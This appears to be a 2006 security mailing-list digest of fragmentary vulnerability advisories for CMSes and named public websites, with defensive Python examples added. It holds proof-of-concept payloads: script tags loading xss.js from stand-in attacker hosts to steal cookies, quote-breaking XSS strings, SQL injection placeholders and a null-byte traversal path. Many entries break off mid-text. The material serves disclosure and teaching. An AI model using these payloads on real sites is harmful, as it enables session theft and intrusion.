-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
- -
Advisory id: FSA:013
Author: Federico Fazzi
Date: 12/06/2006, 9:31
Synthesis: DCP-Portal 6.1.x, Remote command execution
Type: high
Product: http://www.dcp-portal.org/
Patch: u
-
Advisory id: FSA:012
Author: Federico Fazzi
Date: 11/06/2006, 22:30
Synthesis: Content-Builder (CMS) 0.7.5, Remote command execution
Type: high
Product: http://www.content-builder.de/
Patch: unavailable
--
Emllabs.com
Affected files:
articles.php
search input box.
The search input box doesn't properly filter user input. For a PoC try putting
in: [SCRIPT%20SRC=http://evilsite.com/xss.js][/SCRIPT]
XSS Vulnerability:
http://previous.emllabs.com/articles.php?navCur=[SCRIPT%20SRC=http://evils
Hello,
This is for you...
Thanks for reading...
*
* No cON Name 2006 Congress === Call For Papers *
*
<> http://www.noconname.org/congreso2006.php<>
<> September: 28th, 29th and 30th.
-
Advisory id: FSA:014
Author: Federico Fazzi
Date: 12/06/2006, 10:25
Synthesis: phpCMS 1.2.1pl2, Remote command execution
Type: high
Product: http://www.phpcms.de/
Patch: unavailable
---
Internet Explorer Crash [Proof of concept]
based on the bug discovered by MarjinZ & Mr.Niega
Affected Software: Internet explorer
Severity: Unknown
Impact: Crash
E-Mail: [EMAIL PROTECTED]
IE ver. 6.0.2900.2180.xpsp_sp2_rtm.040803-2158 not affected
- Original Message -
From: <[EMAIL PROTECTED]>
To:
Sent: Thursday, June 08, 2006 11:00 PM
Subject: Internet Explorer vulnerbility
/*
*
* Internet Explorer Crash [Proof of concept]
* Bug discovered by MarjinZ & Mr.Niega
* ht
*//Product :Invision Power Board
*//Version :2.1.6 and prior versions must be affected.
*//XSS=
http://localhost/forum/admin.php?phpinfo=alert()
*//You can steal only admins cookie.
*//www.spymastersnake.org
*//[EMAIL PROTECTED]
From the article:
"Access to the at command varies, on some installations of Windows,
even the Guest account can access it, on others it's limited to
Administrator accounts."
But it's limited to members of the Administrators group by default.
Anyone who is an administrator can make their system
I got > 88% if I use your PoC.
But if I press the close button of this tab, the 'DoS'
stops working. ;)
Opera 8.52
OS: NetBSD-current
Yourfacesucks.com
Homepage:
http://www.yourfacesucks.com
Affected files:
music/video input boxes in editing profile
subject box of sending a PM
thread.php
---
XSS Vuln with cookie disclosure in profile input boxes:
No filter evasion needed here. Fo
I agree on your point that the technology requires PROPER design.
Vendors who miss the basics should lose their right to play the game.
On 6/9/06, Michal Zalewski <[EMAIL PROTECTED]> wrote:
On Fri, 9 Jun 2006, E Mintz wrote:
> How about some real-world, application specific exploits?
There's
[EMAIL PROTECTED]:
/*
*
* Internet Explorer Crash [Proof of concept]
* Bug discovered by MarjinZ & Mr.Niega
* http://www.swerat.com/
*
* Affected Software: Internet explorer
* Severity: Unknown
* Impact: Crash
* Solution Status: Unpatched
*
* E-Mail: [EMAIL PROTECTED] & [EMAIL PROTECTED]
* __
Symantec Remote Management Stack Buffer Overflow
Release Date:
June 12, 2006
Date Reported:
May 24, 2006
Severity:
High (Remote Code Execution)
Systems Affected:
Symantec AntiVirus 10.0.x for Windows (all versions)
Symantec AntiVirus 10.1.x for Windows (all versions)
Symantec Client Security 3.
Meefo.com
Homepage:
http://meefo.com
Affected files:
reading profiles
index.php
input boxes on profiles
sending private msgs
--
Reading a profile and with cookie include PoC:
Since data isn't properly filtered (backslashes are added to ' and "), a user
can
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200606-09
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - -
# Milli-Harekat Advisory ( www.milli-harekat.org )
# PHORUM <= 5.1.13 - Remote File Include Vulnerabilities
# Risk : High
# Class: Remote
# Script : PHORUM 5.1.13
# Credits : ERNE
# Thanks : Dj_Remix,The_Bekir,Liz0zim,Eskobar,SpC-x,3n7r1k4 and ALL MHG USERS
# Vulnerable :
http://www
Vampirefreaks.com
Homepage:
http://www.vampirefreaks.com
Affected files:
input boxes of editing your profile
posting a journal entry.
Commenting
XSS Vulnerability:
Data isn't properly filtered when editing your profile. One way to bypass the
filter is to escape quotes and use closing b
At least in terms of Cisco, you are confusing SSL VPN and Web VPN. They are
not interoperable and offer different levels of security.
IE7 Beta 2 build [7.0.5346.5] parses without crashing.
Greg Merideth
Forward Technology, LLC.
CTO & Other Wild Stuff
[EMAIL PROTECTED]
PGP Fingerprint
18C3CE191171736225D62C3829F7B18A00F2AC0C
-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]
Sent: Thursday, June 08, 20
Very good information, we use F5 FirePass products and I could see the same
issue inherent in your statements. The benefits to the business, from a cost
perspective, are many, no need for tokens unless you are doing 2-factor auth,
which I encourage as it will check your personal PIN against you
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
___
Mandriva Linux Security Advisory MDKSA-2006:099
http://www.mandriva.com/security/
___
rPath Security Advisory: 2006-0100-1
Published: 2006-06-12
Products: rPath Linux 1
Rating: Major
Exposure Level Classification:
User Non-deterministic Weakness
Updated Versions:
freetype=/[EMAIL PROTECTED]:devel//1/2.1.10-2.2-1
References:
http://www.cve.mitre.org/cgi-bin/cvename.cgi?n
Virtualtourist.com
Homepage:
http://www.virtualtourist.com
Affected files:
Input boxes of your profile
search destination input box
---
XSS vulnerability with cookie disclosure:
Under the section of "Tell others a little about yourse
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200606-14
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - -
[EMAIL PROTECTED],
require "config.inc"; contains 'private' =>
'/www/mrpenguin.org/devel/private',
So this shouldn't be vulnerable. Missing something?
/str0ke
On 11 Jun 2006 20:47:48 -, [EMAIL PROTECTED]
<[EMAIL PROTECTED]> wrote:
igloo DoubleSpeak v 0.1 Multiple remote file inclusion
Onlinenode.com
Homepage:
http://www.onlinenode.com
Affected files:
node_category.php
node_article.php
webpage.php
guestbook.php
journal.php
pictures.php
chatroom.php
---
XSS Vuln via node_category.php:
One way to achieve this is to use black tags with an op
Stargazer.org
Homepage:
http://www.stargazer.org
Affected files:
login box
registration boxes
creating a survey
---
Login box & registration XSS Vuln:
for proof of concept just try adding:
'';!--"=&{()}http://youfucktard.com/xss.js>'';!--"=&{()
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
= Advisory: Windows XP Task Scheduler Local Privilege Escalation
=
= Author: Daniel Hückmann (zipk0der) [EMAIL PROTECTED]
=
= Released at: http://www.pandora-security.com
=
=-=-
// ThWboard 3.0 <= SQL Injection //
-
[~] Advisory by: SR-Crew
[-] Exploit: http://www.example.com/showtopic.php?threadid=1&pagenum=[SQL]
[-] Googledork: -
[+] Greetz to: BlueGeek.de
[+] Visit: www.SR-Crew.de.tt
Cescripts.com Scripts
Below are scripts I tested from the site cescripts.com. This site seems to be
selling canned scripts, full of errors. Anyway, take a look:
Car Classifieds
Homepage:
http://www.cescripts.com/
Affected files:
index.php
XSS Vulnerabilities PoC:
Viewing a car:
htt
Wireclub.com
Homepage:
http://www.wireclub.com
Affected files:
input boxes of editing a profile
XSS Vuln with no filter evasion at all:
We notice that when trying to put a url in the Open line about yourself input
box, we get the msg "no urls allowed" as well as "the field cannot cont
Nowtalking.com
Homepage:
http://www.nowtalking.com
Affected files:
input boxes of logging in and searching
friends-new.asp
gallery.asp
friends.asp
gb.asp
JET DB error due to injection:
Microsoft JET Database Engine error '80040e14'
Syntax error in string in query expression 'UserNam
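The JET message quoted above ("Syntax error in string in query expression ...") is the fingerprint of user input concatenated straight into SQL text: a single quote in the input terminates the string literal and the rest is parsed as SQL. The following is an added example, not code from the Nowtalking.com post or site; it reproduces the same failure with Python's sqlite3 module (SQLite raises OperationalError where JET returns 80040e14) and puts the parameterised query beside it. The users table, its columns and the credentials are constructed sample data.

```python
import sqlite3


def make_db():
    """Constructed sample table (not from the post); column names are assumptions."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (UserName TEXT, Password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("alice", "s3cret"), ("bob", "hunter2")])
    return db


def login_concat(db, username, password):
    """Vulnerable: the classic ASP + JET pattern, user input glued into the query text.
    A stray quote breaks the string literal, which is exactly the
    'Syntax error in string in query expression' the post shows."""
    sql = ("SELECT UserName FROM users WHERE UserName = '" + username
           + "' AND Password = '" + password + "'")
    return db.execute(sql).fetchone()


def login_param(db, username, password):
    """Hardened: the same query with bound parameters; input is data, never SQL."""
    sql = "SELECT UserName FROM users WHERE UserName = ? AND Password = ?"
    return db.execute(sql, (username, password)).fetchone()


def probe(username, password):
    """Run both variants on the same input.
    Returns (concat_result, param_result); each is the matched name, None, or 'error'."""
    db = make_db()
    try:
        row = login_concat(db, username, password)
        concat = row[0] if row else None
    except sqlite3.OperationalError:
        concat = "error"  # the SQLite counterpart of JET error 80040e14
    row = login_param(db, username, password)
    return concat, (row[0] if row else None)


if __name__ == "__main__":
    for creds in [("alice", "s3cret"), ("o'brien", "x"), ("alice' --", "wrong")]:
        print(creds, "->", probe(*creds))
```

The second probe is the harmless case that surfaces the bug (a legitimate name containing an apostrophe); the third shows why it matters: a comment sequence in the user name removes the password check entirely, while the parameterised version simply finds no such user.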
this is ok:
-
Advisory id: FSA:011
Author: Federico Fazzi
Date: 11/06/2006, 22:30
Synthesis: AWF CMS 1.11, Remote command execution
Type: high
Product: http://www.awf-cms.org/
Patch: unavailable
---
# Foing (manage_songs.php) Remote File Inclusion[phpBB]
#
# Contact : email: [EMAIL PROTECTED] & msn: [EMAIL PROTECTED]
# Risk : High
# Class : Remote
# Script : Foing
# Version : 0.7.0 and previous
-
Vulnerable code :
i
Opengaia.com
Homepage:
http://www.opengaia.com
Affected files:
my_page.php
module.php
editing your profile
the search input box
adding a diary/blog
Just like in onlinenode.com's vulnerabilities, it seems this site filters data
just about the same.
[ORIGINAL ADVISORY:]
http://myimei.com/security/2006-06-11/copperminephotogallery148-addhit-function-sqlinjection-attack.html
HTTP://KAPDA.IR
-Summary-
Software: CPG Coppermine Photo Gallery
Softwares Web Site: http://coppermine.sourceforge.net/
Versions: 1.4.8.stable
Class: Remote
S
PaintedOver.com /show.php XSS Vulnerabilities
Software: PaintedOver.com, Inc. 2004-2006 (Hosted images © their respective owners)
Version: All
Type: Cross site scripting
Date: 11\06\2006 17:00
Credit: redLine
Example:
http://
Wanderlist.com
Homepage:
http://www.wanderlist.com
search.cgi
Search box input
adding a item to a list
Search.cgi XSS vuln with sessions disclosure:
By putting a few ending and opening tags with quotes before and after, we are able
to create a XSS example:
">">">'http://youfucktard.com/xss.js
Myscrapbook
Homepage:
http://www.pixytrix.com/myscrapbook/
Affected files:
singlepage.php
---
Full path error with viewing most files in the txt-db-api dir:
Warning: main(API_HOME_DIRutil.php): failed to open stream: No such file or
directory in /
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
[tempnam() Bypass unique file name PHP 5.1.4]
Author: Maksymilian Arciemowicz (cXIb8O3)
Date:
- -Written: 22.5.2006
- -Public: 11.6.2006
from SECURITYREASON.COM
CVE-2006-2660
- --- 0.Description ---
PHP is an HTML-embedded scripting languag
Cross Site Scripting
http://[...]/read.php?msg_result=[XSS]
http://[...]/read.php?rep_titre=";>[XSS]
Cookies: CSForum_nom=">[XSS]; CSForum_mail=">[XSS]; CSForum_url=">[XSS]
SQL Injection
*
http://[...]/read.php?id=1'[SQL_SELECT]&debut=[SQL_LIMIT]
http://[..
RCblog 1.03
website : www.fluffington.com
discovered by : Hessam-x
www.Hessamx.net
--[ Directory Traversal]
script : "index.php"
/rcblog/index.php?post=../a_file%00
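The %00 in the PoC URL decodes to a NUL byte. The pattern it targets is a script that appends a fixed extension to a user-supplied post name before opening the file: PHP of that era (before 5.3.4) handed the string to a C-level open() unchecked, so the NUL terminated it and the appended extension was silently dropped, leaving a plain "../" traversal. The following is an added example, not RCblog's code: a model of the vulnerable path construction next to a hardened lookup. The directory layout and the ".txt" extension are assumptions.

```python
import os


def vulnerable_post_path(base_dir, post, ext=".txt"):
    """Model of the flawed pattern: post name + fixed extension, joined onto a directory
    and passed to a C open().  Everything from the first NUL byte onward is lost, which
    is what the %00 in the PoC exploits; without the NUL, '..' still walks out of the
    directory but only reaches files with the appended extension."""
    raw = os.path.join(base_dir, post + ext)
    return os.path.normpath(raw.split("\x00", 1)[0])


def safe_post_path(base_dir, post, ext=".txt"):
    """Hardened lookup: the absolute path inside base_dir, or None if rejected.
    Rejects NUL bytes, path separators and dot-prefixed names, then resolves the
    result and insists it still lies under base_dir, which defeats '..' no matter how
    it was encoded."""
    if not post or "\x00" in post:
        return None
    if "/" in post or "\\" in post or post.startswith("."):
        return None
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, post + ext))
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


if __name__ == "__main__":
    base = "/srv/rcblog/posts"  # assumed layout, not from the advisory
    for name in ["hello", "../a_file\x00", "../../../etc/passwd"]:
        print(repr(name), "->", vulnerable_post_path(base, name),
              "|", safe_post_path(base, name))
```

The NUL check alone is not the fix; it only closes the extension bypass. The containment check on the resolved path is what stops traversal, and it holds even where the runtime does not truncate on NUL.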
WinSCP - URI Handler Command Switch Parsing
About winscp :
WinSCP is an open source freeware SFTP client for Windows using SSH.
Legacy SCP protocol is also supported. Its main function is safe copying
of files between a local and a remote computer.
Versions affected :
It was tested on WinSCP 3.
Multiple XSS Vulnerabilities exist in vbulletin.com's website that allow the
attacker to gain sensitive credentials for authenticating himself as a user on
the forum and site.
The first problem lies in the site's Sales Form for opening an issue
ticket. Proper sanitation of variables passe
XSS vulnerability fixed in version 0.50.
Please download the latest version at http://ifoto.ireans.com
Thank you.
...
Aizu
Hotbot.com - XSS vulnerability
--
Type: Cross site scripting
Date: June, 10th 2006
--
Credits:
--
Discovered by: David "Aesthetico" Vieira-Kurz
http://www.m
Lycos.com - XSS vulnerability
--
Type: Cross site scripting
Date: June, 10th 2006
--
Credits:
--
Discovered by: David "Aesthetico" Vieira-Kurz
http://www.ma
==
Secunia Research 12/06/2006
- MyBB "domecode()" PHP Code Execution Vulnerability -
==
Table of Contents
Affected Software.
5 Star Review Script
Homepage:
http://www.review-script.com/
Affected files:
index2.php
report.php
search box
editing your profile
posting a review.
--
index2.php XSS Vuln with cookie disclosure:
By ending quotes and using a few closing and opening tag
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200606-13
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - -
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200606-12
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - -
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200606-11
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - -
Diaryland.com
Homepage:
http://www.diaryland.com
Affected files:
input boxes on creating diary entries.
posting comments in diary entries
XSS Vuln PoC:
With no filter evasion at all, we simply put as our entry:
[SCRIPT SRC=http://youfucktard.com/xss.js][/SCRIPT]
Screenshots:
http://
Mydeardiary.com
Homepage:
http://www.mydeardiary.com
Affected files:
search input boxes
Adding new diary entries
--
We create our XSS example by ending quotes with tags before and after:
">">">'>http://youfucktard.com/xss.js><"<"<"<"<"
Screensho
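Several of the site reports above describe the same two facts from the attacker's side: Meefo.com adds backslashes to quotes but is still injectable, and Vampirefreaks.com, Wanderlist.com and Mydeardiary.com fall to a payload that opens with `">` repeated. Both follow from one thing: backslash-escaping is a SQL string convention that an HTML parser ignores, so a `\"` still closes a quoted attribute, and a script tag needs no quotes at all. The following is an added example, not code from any of the posts or sites; it renders a constructed payload through an addslashes-style filter and through HTML entity encoding, then runs Python's tolerant html.parser over the result to list the tags a browser would create. The form markup, field names and the attacker host are assumptions.

```python
import html
from html.parser import HTMLParser

# Constructed payload (not from the posts); the host name is a placeholder.
PAYLOAD = '"><script src=http://attacker.example/xss.js></script><"'


def addslashes(s):
    """Mimic PHP's addslashes() / magic_quotes_gpc: backslash-escape quotes and
    backslashes.  This is a SQL string convention; an HTML parser gives a backslash
    no meaning at all."""
    return s.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')


def entity_escape(s):
    """The correct output encoding for HTML text and quoted attribute values."""
    return html.escape(s, quote=True)


def render_attr(value, escape):
    """Profile edit form: the stored value is echoed back inside a quoted attribute."""
    return '<input type="text" name="about" value="%s">' % escape(value)


def render_text(value, escape):
    """Profile view: the stored value is echoed as element content."""
    return '<p class="about">%s</p>' % escape(value)


class TagCollector(HTMLParser):
    """Records the start tags a tolerant HTML tokenizer sees, as a browser would."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)

    handle_startendtag = handle_starttag


def tags_seen(markup):
    p = TagCollector()
    p.feed(markup)
    p.close()
    return p.tags


def compare(value=PAYLOAD):
    """For each output context and escaper, the tags the browser builds from the page."""
    return {
        "attr/addslashes": tags_seen(render_attr(value, addslashes)),
        "attr/entity": tags_seen(render_attr(value, entity_escape)),
        "text/addslashes": tags_seen(render_text(value, addslashes)),
        "text/entity": tags_seen(render_text(value, entity_escape)),
    }


if __name__ == "__main__":
    for context, tags in compare().items():
        print("%-16s %s" % (context, tags))
```

In the attribute context the leading `">` closes the input element under addslashes because the parser reads `\` as an ordinary character and the following `"` as the end of the value; in the text context no quote is needed, so the backslash filter never even fires. Entity encoding turns `<`, `>` and `"` into `&lt;`, `&gt;` and `&quot;`, and only the template's own tags survive.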
igloo DoubleSpeak v 0.1 Multiple remote file inclusion
-
Aria-security.com advisory
Bug Discovered by [EMAIL PROTECTED] (amin emami)
Original Advisory:http://www.aria-security.net/advisory/igloo/doublespeak.txt
email:[EMAIL PROTECTED]
Date:1
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200606-10
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - -